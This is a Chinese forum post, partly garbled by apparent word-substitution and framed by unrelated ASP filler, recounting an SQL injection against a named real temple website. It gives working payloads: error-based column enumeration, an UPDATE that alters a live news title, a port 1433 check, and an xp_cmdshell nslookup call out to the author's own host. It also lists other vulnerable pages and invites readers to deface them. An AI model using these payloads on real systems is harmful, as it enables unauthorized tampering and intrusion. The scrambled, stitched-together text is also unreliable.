|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
ActiveServerPage技术为应用开发商提供了基于脚本的直观、快速、高效的应用开发手段,极大地提高了开发的效果。在讨论ASP的安全性问题之前,让我们来看看ASP是怎么工作的。方才重新闻上听到一条动静:少林网站发布武功秘籍;呵呵!这个对照爽!
特地就往少林寺的网站上看了看,http://www.shaolin.org.cn/
翻开后,看到有旧事体系,随便扫瞄了一下几条旧事,都是html的,仿佛没甚么成绩,可是当我把鼠标放到首页旧事上时,发明他的毗连是“javascript:MM_openBrWindow(../../../asp/news_article.asp?
NewsID=649,news,scrollbars=yes,width=520,height=400)”,人人大概注重到了,有大概存在注进,我也是没事看电视,那就浸透一下尝尝。
1、输出地点:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649,
能够翻开旧事,申明url准确,加后,前往
----------------------------------------------------------------------------------
MicrosoftOLEDBProviderforSQLServer毛病80040e14
Unclosedquotationmarkbeforethecharacterstring.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
应当是sql数据库。
2、利用having1=1―,提醒
----------------------------------------------------------------------------------
MicrosoftOLEDBProviderforSQLServer毛病80040e14
ColumnShaolin_NewsList.NewsIDisinvalidintheselectlistbecauseitisnot
containedinanaggregatefunctionandthereisnoGROUPBYclause.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
很快就可以取得它的表shaolin_newslist的一切字段:newsid、NewsUpdateDat、NewsTitle、NewsContent
3、接上去我测试了一下数据库用户权限
http://www.shaolin.org.cn/asp/news_article.asp?NewsID=649;
update%20shaolin_newslist%20set%20NewsTitle=少林药局数百医疗摄生秘方初次向天下公然!%20where%20newsid=649--
图:
<p><imgsrc="http://www.coolersky.com/Images/webpage/20040808001.JPG"
alt="照片.JPG(663395bytes)"width="527"height="234"></p>
看来对表有完全权限,能够增编削
4、接着看1433开没
telnetwww.shaolin.org.cn1433
看来开着
5、那尝尝数据库操纵员的权限
当地监听udp53:NcCuClCp53
然后会见:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649;
execmaster.dbo.xp_cmdshellnslookupa.com*.*.*.*--
*为我的ip地点,
没有反响,那末应当不是sysadmin权限了
看来权限就是这些,由于没有体系的搜集信息,也不盘算怎样,就到此为止!实在另有良多页面都存在这个成绩,好比:
http://www.shaolin.org.cn/html/html/wu/menu4.htm
http://www.shaolin.org.cn/html/html/wu/teach_wushu.asp
中传送参数的地位,瞥见那些尽世武功了吗?假如你乐意,能够给他添一条“XXX”甚么的,呵呵!
实在,在1年前就用过相似办法测试过当地对照年夜的几个信息港,随后就给他们提交了毛病呈报,可是到如今毛病还在那边摆着,为了不给本人惹贫苦,至今也没有发布出来,仍是等他们修补了,我再发布细节吧!
====================================================================================================
发给网管没反响,在bbs上,我注册coolersky后,逝世活没有找到怎样发帖,没辙!任天由命吧,最好不要被小日本弄定!
由于ASP还是一种Script语言所没除了大量使用组件外,没有办法提高其工作效率。它必须面对即时编绎的时间考验,同时我们还不知其背后的组件会是一个什么样的状况; |
|